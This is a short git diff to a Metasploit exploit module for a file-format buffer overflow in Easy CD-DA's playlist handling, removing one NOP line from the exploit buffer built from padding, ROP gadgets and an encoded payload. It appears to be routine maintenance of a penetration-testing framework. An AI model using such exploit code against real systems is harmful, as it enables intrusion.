diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 280a8f2952..5bc71a3ef8 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -108,7 +108,6 @@ class Metasploit3 < Msf::Exploit::Remote sploit << rand_text_alpha_upper(56) sploit << rop_nops(8) sploit << rop_gadgets - sploit << make_nops(4) sploit << payload.encoded sploit << rand_text_alpha_upper(10000) # make it crash